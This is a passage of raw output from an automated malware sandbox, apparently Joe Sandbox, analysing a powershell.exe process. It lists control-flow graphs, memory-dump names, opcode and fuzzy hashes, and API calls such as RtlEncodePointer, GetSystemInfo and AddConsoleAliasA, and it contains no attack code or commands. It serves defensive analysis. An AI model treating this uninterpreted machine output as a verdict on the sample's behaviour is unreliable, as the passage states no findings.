31d058e-31d05bb 593->596 597 31d05d2-31d062d 593->597 596->592 596->593 597->598 598->549 600->591 603 31d045c-31d04b5 601->603 604 31d04cf-31d0517 601->604 603->587 603->588 604->600 649->497 653->518 654->518 655->518
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de63c114a4c3a2d6fa4f317738e81dacf56278f7678460e513407b224ea592cf
                                                                • Instruction ID: 86c4ff55a593d419c1ee183a172d37c26fe2c5766430fc3396f9d1531c2dd2ca
                                                                • Opcode Fuzzy Hash: de63c114a4c3a2d6fa4f317738e81dacf56278f7678460e513407b224ea592cf
                                                                • Instruction Fuzzy Hash: D3426A34A01219CFDB24DF64C854BADB7B2FF89305F1445A9D80AAB391DB35AD81CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0307A6E7, Relevance: .6, Instructions: 571COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 656 307a6e7-307a711 657 307a717-307a723 656->657 658 307ab41 656->658 659 307ac27-307ac31 657->659 660 307a729-307a730 657->660 663 307ab4b-307ab52 658->663 667 307aca7-307acb0 659->667 668 307ac33-307ac45 659->668 661 307a736-307a751 660->661 662 307a989-307a98d 660->662 661->662 675 307a757-307a75f 661->675 665 307a98f-307a99d 662->665 666 307a9fa-307aa00 662->666 682 307ab57-307ab5e 663->682 679 307a9a3-307a9ca 665->679 680 307abb2-307abc0 665->680 669 307aa06-307aa17 666->669 670 307aac5-307aac8 666->670 683 307ad17-307ad35 667->683 684 307acb2-307acc2 667->684 668->667 685 307ac47-307aca2 668->685 686 307ad80-307ad8f 669->686 687 307aa1d-307aa32 669->687 673 307af1b-307af22 670->673 675->663 681 307a765-307a76c 675->681 731 307a9cc-307a9cf 679->731 732 307a9d8-307a9ef 679->732 680->666 695 307abc6-307abe3 680->695 688 307a772-307a787 681->688 689 307a8bb-307a905 681->689 702 307ab63-307ab6a 682->702 718 307ad37-307ad46 683->718 719 307ad5c-307ad78 683->719 722 307acc4-307ace3 684->722 723 307aceb-307ad0f 684->723 685->673 703 307ad91-307ada0 686->703 704 307ae08-307ae17 686->704 713 307aa34-307aa43 687->713 688->689 701 307a78d-307a795 688->701 754 307ab95-307ab9c 689->754 755 307a90b-307a917 689->755 695->666 721 307abe9-307ac22 695->721 701->682 706 307a79b-307a7a2 701->706 736 307ab6f-307ab76 702->736 703->704 733 307ada2-307ae03 703->733 728 307ae35-307ae44 704->728 729 307ae19-307ae30 704->729 715 307a7a4-307a7ac 706->715 716 307a7bf-307a7c9 706->716 742 307aa45-307aa54 713->742 743 307aa6b-307aaba 713->743 715->702 725 307a7b2-307a7b9 715->725 716->689 726 307a7cf-307a7d7 716->726 718->719 746 307ad48-307ad53 718->746 719->686 721->666 722->723 723->683 725->689 725->716 726->736 737 307a7dd-307a7e4 726->737 728->713 756 307ae4a-307ae61 728->756 729->713 731->732 825 307a9f1 call 307af71 732->825 826 307a9f1 call 307af80 732->826 733->713 769 307ab7b-307ab90 736->769 744 307a816-307a825 737->744 745 307a7e6-307a7f5 737->745 742->743 768 307aa56-307aa65 742->768 809 307aabc 743->809 772 307a827-307a836 744->772 773 307a853-307a862 744->773 745->744 770 307a7f7-307a810 745->770 746->719 771 307ad55-307ad58 746->771 751 307a9f7 751->666 763 307aba2-307abad 754->763 764 307a97c-307a986 754->764 755->769 780 307a91d-307a973 755->780 756->713 763->764 764->662 768->743 789 307ae66-307aec8 768->789 769->764 770->689 770->744 771->719 772->773 791 307a838-307a851 772->791 773->662 793 307a868-307a877 773->793 780->764 789->809 791->689 791->773 793->662 802 307a87d-307a896 793->802 802->662 816 307a89c-307a8b5 802->816 809->670 816->662 816->689 825->751 826->751
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51f5f8934259f74ba6c2538c07e6bcd85fc2e176e202df065279a73313bd9ddb
                                                                • Instruction ID: 01ea6a213d42740515828c10c5dd2f754862b59aca046fcc62c099ff5e2ff04a
                                                                • Opcode Fuzzy Hash: 51f5f8934259f74ba6c2538c07e6bcd85fc2e176e202df065279a73313bd9ddb
                                                                • Instruction Fuzzy Hash: DE227B34B012049FDB44DBA5C994AAEB7F6AF88304F248468E902DF395DB39ED45CB54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0307BA50, Relevance: .5, Instructions: 454COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 827 307ba50-307ba79 828 307ba87 827->828 829 307ba7b-307ba85 827->829 830 307ba8c-307ba8e 828->830 829->830 831 307bab0-307bac5 830->831 832 307ba90-307baae 830->832 835 307bac8-307bae4 831->835 832->835 837 307bfa4-307bfb3 835->837 838 307baea-307baf3 835->838 839 307bfb6-307bfd0 838->839 840 307baf9-307bb17 838->840 844 307bf92-307bf9e 840->844 845 307bb1d-307bb25 840->845 844->837 844->838 846 307bb27-307bb31 845->846 847 307bb33 845->847 848 307bb38-307bb3a 846->848 847->848 849 307bb56-307bb71 848->849 850 307bb3c-307bb50 848->850 853 307bb77-307bb7b 849->853 854 307bd4a 849->854 850->844 850->849 853->854 856 307bb81-307bb86 853->856 855 307bd4c-307bd4f 854->855 857 307bd55-307bd87 855->857 858 307be8c 855->858 859 307bb8f 856->859 860 307bb88-307bb8d 856->860 899 307bd89-307bda0 857->899 900 307bda8-307bde0 call 307b3a0 857->900 863 307be94-307be96 858->863 861 307bb96-307bb98 859->861 860->861 864 307bbb2-307bbb7 861->864 865 307bb9a-307bbac 861->865 863->844 868 307be9c-307bea6 863->868 866 307bbc0 864->866 867 307bbb9-307bbbe 864->867 865->854 865->864 869 307bbc7-307bbc9 866->869 867->869 871 307bf55-307bf83 868->871 872 307beac-307beb0 868->872 874 307bbcb-307bbd0 869->874 875 307bbe8-307bbed 869->875 871->844 886 307bf85-307bf8f 871->886 872->871 876 307beb6-307bec2 872->876 877 307bbd2-307bbd7 874->877 878 307bbd9 874->878 879 307bbf6 875->879 880 307bbef-307bbf4 875->880 891 307bec4-307bedc 876->891 892 307bede-307bf01 876->892 883 307bbe0-307bbe2 877->883 878->883 884 307bbfd-307bbff 879->884 880->884 883->875 887 307bcd9-307bcfc 883->887 888 307bc01-307bc06 884->888 889 307bc30-307bc35 884->889 895 307bd43-307bd48 887->895 896 307bcfe-307bd41 887->896 897 307bc0f 888->897 898 307bc08-307bc0d 888->898 901 307bc37-307bc3c 889->901 902 307bc3e 889->902 891->871 891->892 893 307bf03-307bf48 892->893 894 307bf4a-307bf4c 892->894 893->871 893->894 894->871 895->855 896->855 904 307bc16-307bc18 897->904 898->904 899->900 928 307bda2-307bda5 899->928 936 307bde6-307bdf2 900->936 937 307be69-307be6d 900->937 903 307bc45-307bc47 901->903 902->903 907 307bc74-307bc79 903->907 908 307bc49-307bc4e 903->908 904->889 911 307bc1a-307bc2a 904->911 916 307bc82-307bc84 907->916 917 307bc7b-307bc80 907->917 914 307bc57 908->914 915 307bc50-307bc55 908->915 911->887 911->889 919 307bc5e-307bc60 914->919 915->919 922 307bc8b-307bc8d 916->922 917->922 919->907 926 307bc62-307bc72 919->926 922->854 927 307bc93-307bc9f 922->927 926->887 926->907 927->854 935 307bca5-307bcbb 927->935 928->900 935->854 945 307bcc1-307bcd7 935->945 943 307bdf4-307be51 936->943 944 307be53-307be67 936->944 938 307be6f-307be71 937->938 939 307be79-307be89 937->939 938->939 943->939 944->939 945->854 945->887
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 708a24726a9d36d976c461e0d29c4b084bc671704af71527173ae335c26d49b1
                                                                • Instruction ID: 6cfc1ac923eef21e1db5d590e35bfc03adb229dad0a704bf98b912e62ee82c2b
                                                                • Opcode Fuzzy Hash: 708a24726a9d36d976c461e0d29c4b084bc671704af71527173ae335c26d49b1
                                                                • Instruction Fuzzy Hash: 5E028C34A012098BDF59DFB5C8906AEBBB6BF89304F18856DEC019F295EB75E841CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031DAFA8, Relevance: .3, Instructions: 302COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 266bbee71c16614ffb6e40d6e693346c3f62d621922ebe755f6a252d334bb8a7
                                                                • Instruction ID: a861e1bba68b39b216c07ddec553628ab456d1282ba84c8b18b5a6d81f672876
                                                                • Opcode Fuzzy Hash: 266bbee71c16614ffb6e40d6e693346c3f62d621922ebe755f6a252d334bb8a7
                                                                • Instruction Fuzzy Hash: 8BB1AA74B042088FDB14DFB4D854AAEBBF6EFC9200F19856DD406AB394DF349C428B62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031DE620, Relevance: .2, Instructions: 242COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f44b5aa5a040b01d661a51a8551d4d3c863c2f12497a5f0e582d3e7e8ab6ed43
                                                                • Instruction ID: c8a7ed649f606cae42f93b13309ebad92cebcce5b44486d7cf781951ec38a751
                                                                • Opcode Fuzzy Hash: f44b5aa5a040b01d661a51a8551d4d3c863c2f12497a5f0e582d3e7e8ab6ed43
                                                                • Instruction Fuzzy Hash: EF912275E0071A8BDB14CF65CC44799F7B6BFC9304F248699D409BB240EBB0A985CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D5F27, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 193 31d5f27-31d5f32 194 31d5f3c-31d9759 call 31d67bd 193->194 195 31d5f34-31d5f36 193->195 200 31d9761-31d978c RtlEncodePointer 194->200 195->194 201 31d978e-31d9794 200->201 202 31d9795-31d97a9 200->202 201->202
                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,031D872A), ref: 031D977F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 8e7ecb584e9f04456b901e299104bb9114a82f884f029b2396959cf3ff4eede4
                                                                • Instruction ID: ff574380279f979a793144efa15040a24490c73a62fb34b5891069812e267464
                                                                • Opcode Fuzzy Hash: 8e7ecb584e9f04456b901e299104bb9114a82f884f029b2396959cf3ff4eede4
                                                                • Instruction Fuzzy Hash: 482180B1C043889FDB11DFA9C494BCEBFF4EF0A214F18449AD558AB241D3385448CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D2AB0, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 204 31d2ab0-31d2ae3 208 31d2ae5 call 31d2a08 204->208 209 31d2ae5 call 31d29fa 204->209 205 31d2aeb-31d2aed 206 31d2aef-31d2af7 205->206 207 31d2afa-31d2b42 DrawStateW 205->207 208->205 209->205
                                                                APIs
                                                                • DrawStateW.USER32(?,?,?,?,?), ref: 031D2B36
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: DrawState
                                                                • String ID:
                                                                • API String ID: 345284738-0
                                                                • Opcode ID: 8587c938e6ee193b263d640a29f270e658e7bfc27d989fc8d5422a09f7cfb94b
                                                                • Instruction ID: d8a6529e8fb3092248e6c733b36f2225463cc277ea2353a1417dd431a53e9ce4
                                                                • Opcode Fuzzy Hash: 8587c938e6ee193b263d640a29f270e658e7bfc27d989fc8d5422a09f7cfb94b
                                                                • Instruction Fuzzy Hash: F111EF72D0010DAFCF41DF99D8049EEBBB9FF88314F00866AE518E2120E7319665DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D9718, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 216 31d9718-31d9759 217 31d9761-31d978c RtlEncodePointer 216->217 218 31d978e-31d9794 217->218 219 31d9795-31d97a9 217->219 218->219
                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,031D872A), ref: 031D977F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 7dae39876c6495b6c735762d935c97a9706f09472cc884af7b3dc05c769d05be
                                                                • Instruction ID: 228402d81fa67f7a72111ddb05f122968430a07ea3804e54349aa062c3e9db4d
                                                                • Opcode Fuzzy Hash: 7dae39876c6495b6c735762d935c97a9706f09472cc884af7b3dc05c769d05be
                                                                • Instruction Fuzzy Hash: 511133B48002498FCB20CFA9D484BEEBFF4EB49324F24846AD419A7600C378A544CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D5F54, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 210 31d5f54-31d978c RtlEncodePointer 213 31d978e-31d9794 210->213 214 31d9795-31d97a9 210->214 213->214
                                                                APIs
                                                                • RtlEncodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,031D872A), ref: 031D977F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID:
                                                                • API String ID: 2118026453-0
                                                                • Opcode ID: 6f813641a7568e1cec7d09df13fb1935273fb0b3985ae509ae1faa8454e8e652
                                                                • Instruction ID: 5b7aeb17bc6146eeb7d4388b2432bb2ec4dff0e360c22241fa77375995696f0e
                                                                • Opcode Fuzzy Hash: 6f813641a7568e1cec7d09df13fb1935273fb0b3985ae509ae1faa8454e8e652
                                                                • Instruction Fuzzy Hash: 5911FEB49003189FCB10DF99C888BDEBBF4EB49324F24846AE519A7600D378A944CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0307AF71, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 221 307af71-307afaf GetPointerCursorId 223 307afb0 221->223
                                                                APIs
                                                                • GetPointerCursorId.USER32(?,?,?,?,00000000,?,?,?), ref: 0307AFA8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CursorPointer
                                                                • String ID:
                                                                • API String ID: 93376120-0
                                                                • Opcode ID: 760dc55a6c352ddbbd0ee6f8872e0c243504488a4da12a82f4af3c1007a08fe0
                                                                • Instruction ID: 12a1e1ff48f216c6c21cca6870363dc031596285c9c83f9acc3d929d04292e18
                                                                • Opcode Fuzzy Hash: 760dc55a6c352ddbbd0ee6f8872e0c243504488a4da12a82f4af3c1007a08fe0
                                                                • Instruction Fuzzy Hash: 4CF01C7240420DFFCF01CFA4DC018EA7FBAEB49200B048096F90487121D6369A31ABA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0307AF80, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 224 307af80-307afaf GetPointerCursorId 225 307afb0 224->225
                                                                APIs
                                                                • GetPointerCursorId.USER32(?,?,?,?,00000000,?,?,?), ref: 0307AFA8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CursorPointer
                                                                • String ID:
                                                                • API String ID: 93376120-0
                                                                • Opcode ID: a35a8a6249199463ee2009129ba37745ebb7ee05f969ff433990af36acd7fa87
                                                                • Instruction ID: 01206c2e02d2534e3af45086054988c855da75075a6cdfea25c77dd1bb83d7b5
                                                                • Opcode Fuzzy Hash: a35a8a6249199463ee2009129ba37745ebb7ee05f969ff433990af36acd7fa87
                                                                • Instruction Fuzzy Hash: 67E0927690020DFF9F01DEA19D00CAF7BBAEB48200B10C465BA0496120E6328A31ABA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 03075CE8, Relevance: 2.2, Strings: 1, Instructions: 924COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: d2e0ba86792247daf5039b2b4523e15413d9a084a91a00668940baf4f17823b3
                                                                • Instruction ID: fd260780061b575410be2ba4e7b25b6823d6a82825649bd706a5f02494dc28be
                                                                • Opcode Fuzzy Hash: d2e0ba86792247daf5039b2b4523e15413d9a084a91a00668940baf4f17823b3
                                                                • Instruction Fuzzy Hash: 8B825974F012188FDB64DF74C854AAEBBF6AF88304F1485AED40AAB351DB319E858F45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031DB4E0, Relevance: 1.6, Strings: 1, Instructions: 381COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Cv
                                                                • API String ID: 0-2367982687
                                                                • Opcode ID: b849ff74c212e583cf3079fe90aab2c944294101e23c52133d0ace2f3c66ead3
                                                                • Instruction ID: 7acfd68c91bcfb612f8e23f15586b73dc94c584265b20f325798c96416e7e08a
                                                                • Opcode Fuzzy Hash: b849ff74c212e583cf3079fe90aab2c944294101e23c52133d0ace2f3c66ead3
                                                                • Instruction Fuzzy Hash: D2D18A39B042009FDB28EB75D855A7AB7A6EF8A214F59C52DD417DB390DB30EC02CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D6580, Relevance: .9, Instructions: 944COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 02188ad18345c928038d0f44b2c7683d9d2431cd6f78ccdf58ca158bf887d480
                                                                • Instruction ID: 52e2ef6c9efa32a0e09b30e3ba88de811cefb67e66b42f03a1e9793d118fb85c
                                                                • Opcode Fuzzy Hash: 02188ad18345c928038d0f44b2c7683d9d2431cd6f78ccdf58ca158bf887d480
                                                                • Instruction Fuzzy Hash: CCA2C574A01219CFDB64DF69C988B9DBBF2BB49300F1485EAD909A7360DB359E81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03077750, Relevance: .7, Instructions: 673COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1e31cb33c8d1f36089488312ba6a7b5e1fd4ab1dda9b9fbbedd22a000c907b1
                                                                • Instruction ID: 4f925ad918a6a0359efa2879f40542a21cf317af5f2174e2599744b187816f0d
                                                                • Opcode Fuzzy Hash: f1e31cb33c8d1f36089488312ba6a7b5e1fd4ab1dda9b9fbbedd22a000c907b1
                                                                • Instruction Fuzzy Hash: F2328A78B002058FDB14EFB8C954A7EB7E6EF88650B18846DD5069B394DF34EC42CB96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031DA640, Relevance: .4, Instructions: 390COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5c6a42ecc7fad5566558ec5bf9991cd5f8eee12b60f618a2001299edc0285225
                                                                • Instruction ID: df62bb16e47b640efc32fbed706a522425ea19215ef182795fe8137ed6295729
                                                                • Opcode Fuzzy Hash: 5c6a42ecc7fad5566558ec5bf9991cd5f8eee12b60f618a2001299edc0285225
                                                                • Instruction Fuzzy Hash: 3AE1AD78B002048FDB14EFB4D954AAEB7B6EFC9310F19856DD806AB394DF349C428B56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 03075CD9, Relevance: .4, Instructions: 362COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49ed31b391fbc17ccf763b1e1743bd11f3ab870329915ac572e7c13a13439dc3
                                                                • Instruction ID: f63cc2f9824537352d28cf5bbf8eea9d59a32729fca3ec6c69f8c9f5f61b16fe
                                                                • Opcode Fuzzy Hash: 49ed31b391fbc17ccf763b1e1743bd11f3ab870329915ac572e7c13a13439dc3
                                                                • Instruction Fuzzy Hash: 5DE14C74E002188FDB64DF75C850BAEBBF2AF89304F1485AEC40AAB355DB359D858F85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 031D59B8, Relevance: .3, Instructions: 336COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.454109243.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_31d0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92f056da32d8627ed6cbbd05866fd17eb2135b06e638562b0913308388b95d3f
                                                                • Instruction ID: 696326d1287e6dd08709f809bbd57bc41227cb3a2ed01fcaf617da0300bdf5a9
                                                                • Opcode Fuzzy Hash: 92f056da32d8627ed6cbbd05866fd17eb2135b06e638562b0913308388b95d3f
                                                                • Instruction Fuzzy Hash: 2FB1D5347007008FD764EF36885467FB6E7AFCA648B18882DC106DB394EF74AC0A8796
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0307B6F8, Relevance: .2, Instructions: 217COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.452136572.0000000003070000.00000040.00000001.sdmp, Offset: 03070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_3070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94bb1db457ff1a85f30b7ed49033c0a234c3b6423e0a582fe740222e2fb52a2d
                                                                • Instruction ID: 98ef01385254099962972b234be98d96b43453c4fca3f8246dcb676a720a6c3b
                                                                • Opcode Fuzzy Hash: 94bb1db457ff1a85f30b7ed49033c0a234c3b6423e0a582fe740222e2fb52a2d
                                                                • Instruction Fuzzy Hash: 93819A34F012488FDB59CFA5C8507AEBBBAAF89304F28806DE8059F395EB74D945CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Analysis Process: powershell.exe PID: 912 Parent PID: 5860 powershell.exeCOMMON

                                                                Execution Graph

                                                                Execution Coverage:8.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:12.8%
                                                                Total number of Nodes:109
                                                                Total number of Limit Nodes:7

                                                                Graph

                                                                execution_graph 41584 7a8deb8 41585 7a8defe GetSystemInfo 41584->41585 41586 7a8df2e 41585->41586 41658 7a8a518 41659 7a8a533 41658->41659 41661 7a8a591 41659->41661 41663 7a8a4b8 41659->41663 41664 7a83390 2 API calls 41663->41664 41665 7a8a4c4 41664->41665 41666 7a83170 2 API calls 41665->41666 41667 7a8a4d2 41665->41667 41666->41667 41597 efcd09 41598 efcd0e 41597->41598 41600 efcaed 41597->41600 41599 efcc24 41600->41599 41603 c04f98 41600->41603 41608 c04fa8 41600->41608 41604 c04fa8 41603->41604 41605 c05286 41604->41605 41613 c04cd8 41604->41613 41621 c04cbb 41604->41621 41605->41600 41610 c04fd8 41608->41610 41609 c05286 41609->41600 41610->41609 41611 c04cd8 5 API calls 41610->41611 41612 c04cbb 5 API calls 41610->41612 41611->41609 41612->41609 41614 c04cf7 41613->41614 41615 c04d12 41613->41615 41614->41615 41629 c046c0 41614->41629 41633 c043fe 41614->41633 41637 c0446c 41614->41637 41641 c042a9 41614->41641 41645 c04811 41614->41645 41615->41605 41622 c04cc2 41621->41622 41623 c04d12 41622->41623 41624 c046c0 AddConsoleAliasA 41622->41624 41625 c04811 AddConsoleAliasA 41622->41625 41626 c042a9 AddConsoleAliasA 41622->41626 41627 c0446c AddConsoleAliasA 41622->41627 41628 c043fe AddConsoleAliasA 41622->41628 41623->41605 41624->41623 41625->41623 41626->41623 41627->41623 41628->41623 41631 c04407 41629->41631 41630 c04a3c AddConsoleAliasA 41632 c0490f 41630->41632 41631->41630 41631->41632 41635 c043ea 41633->41635 41634 c04a3c AddConsoleAliasA 41636 c0490f 41634->41636 41635->41634 41635->41636 41640 c04407 41637->41640 41638 c04a3c AddConsoleAliasA 41639 c0490f 41638->41639 41640->41638 41640->41639 41643 c042d2 41641->41643 41642 c04a3c AddConsoleAliasA 41644 c0490f 41642->41644 41643->41642 41643->41644 41647 c0481e 41645->41647 41646 c04a3c AddConsoleAliasA 41648 c0490f 41646->41648 41647->41646 41647->41648 41535 7a83ca0 41536 7a83cd1 41535->41536 41537 7a83daa 41536->41537 41540 7a83380 41536->41540 41545 7a83390 41536->41545 41541 7a833b3 41540->41541 41542 7a83437 41541->41542 41550 7a83170 41541->41550 41554 7a83161 41541->41554 41542->41537 41546 7a833b3 41545->41546 41547 7a83437 41546->41547 41548 7a83170 2 API calls 41546->41548 41549 7a83161 2 API calls 41546->41549 41547->41537 41548->41547 41549->41547 41551 7a83184 41550->41551 41552 7a8318b 41551->41552 41558 7a82bf8 41551->41558 41552->41542 41555 7a83184 41554->41555 41556 7a8318b 41555->41556 41557 7a82bf8 2 API calls 41555->41557 41556->41542 41557->41556 41560 7a82c1c 41558->41560 41559 